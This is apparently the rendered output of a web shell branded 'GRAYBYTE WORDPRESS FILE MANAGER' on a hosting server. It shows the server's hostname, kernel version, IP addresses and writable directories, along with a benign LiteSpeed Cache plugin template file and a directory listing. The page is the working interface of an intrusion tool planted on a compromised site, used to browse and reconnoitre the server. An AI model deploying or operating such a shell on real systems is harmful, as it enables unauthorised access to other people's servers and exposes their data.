✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ server303.web-hosting.com ​🇻​♯➤ 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 199.188.205.31 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.41
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /usr/src/litespeed-wp-plugin/7.2/litespeed-cache/tpl//esi_widget_edit.php
<?php
namespace LiteSpeed;

defined( 'WPINC' ) || exit;

// $widget, $return, $instance

$options = ! empty( $instance[ Base::OPTION_NAME ] ) ? $instance[ Base::OPTION_NAME ] : array();

if ( empty( $options ) ) {
	$options = array(
		ESI::WIDGET_O_ESIENABLE => Base::VAL_OFF,
		ESI::WIDGET_O_TTL       => '28800',
	);

	add_filter( 'litespeed_widget_default_options', 'LiteSpeed\ESI::widget_default_options', 10, 2 );

	$options = apply_filters( 'litespeed_widget_default_options', $options, $widget );
}

if ( empty( $options ) ) {
	$esi = Base::VAL_OFF;
	$ttl = '28800';
} else {
	$esi = $options[ ESI::WIDGET_O_ESIENABLE ];
	$ttl = $options[ ESI::WIDGET_O_TTL ];
}

$display = Admin_Display::cls();

?>
<div class="litespeed-widget-setting">

	<h4>LiteSpeed Cache:</h4>

	<b><?php echo __( 'Enable ESI', 'litespeed-cache' ); ?>:</b>
	&nbsp;&nbsp;
	<div class="litespeed-inline">
		<div class="litespeed-switch litespeed-mini">
		<?php

			$id   = ESI::WIDGET_O_ESIENABLE;
			$name = $widget->get_field_name( $id );

			$cache_status_list = array(
				array( Base::VAL_ON, __( 'Public', 'litespeed-cache' ) ),
				array( Base::VAL_ON2, __( 'Private', 'litespeed-cache' ) ),
				array( Base::VAL_OFF, __( 'Disable', 'litespeed-cache' ) ),
			);

			foreach ( $cache_status_list as $v ) {
				list( $v, $txt ) = $v;
				$id_attr         = $widget->get_field_id( $id ) . '_' . $v;
				$checked         = $esi === $v ? 'checked' : '';
				echo "<input type='radio' autocomplete='off' name='$name' id='$id_attr' value='$v' $checked /> <label for='$id_attr'>$txt</label>";
			}
			?>

		</div>
	</div>
	<br /><br />

	<b><?php echo __( 'Widget Cache TTL:', 'litespeed-cache' ); ?></b>
	&nbsp;&nbsp;
	<?php
		$id   = ESI::WIDGET_O_TTL;
		$name = $widget->get_field_name( $id );
		echo "<input type='text' class='regular-text litespeed-reset' name='$name' value='$ttl' size='7' />";
	?>
	<?php echo __( 'seconds', 'litespeed-cache' ); ?>

	<p class="install-help">
		<?php echo __( 'Recommended value: 28800 seconds (8 hours).', 'litespeed-cache' ); ?>
		<?php echo __( 'A TTL of 0 indicates do not cache.', 'litespeed-cache' ); ?>
	</p>
</div>

<br />


Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
18 Jun 2025 10.15 PM
root / root
0755
banner
--
18 Jun 2025 10.15 PM
root / root
0755
cache
--
18 Jun 2025 10.15 PM
root / root
0755
cdn
--
18 Jun 2025 10.15 PM
root / root
0755
crawler
--
18 Jun 2025 10.15 PM
root / root
0755
dash
--
18 Jun 2025 10.15 PM
root / root
0755
db_optm
--
18 Jun 2025 10.15 PM
root / root
0755
general
--
18 Jun 2025 10.15 PM
root / root
0755
img_optm
--
18 Jun 2025 10.15 PM
root / root
0755
inc
--
18 Jun 2025 10.15 PM
root / root
0755
page_optm
--
18 Jun 2025 10.15 PM
root / root
0755
presets
--
18 Jun 2025 10.15 PM
root / root
0755
toolbox
--
18 Jun 2025 10.15 PM
root / root
0755
esi.tpl.php
0.083 KB
18 Jun 2025 10.15 PM
root / root
0644
esi_widget_edit.php
2.097 KB
18 Jun 2025 10.15 PM
root / root
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF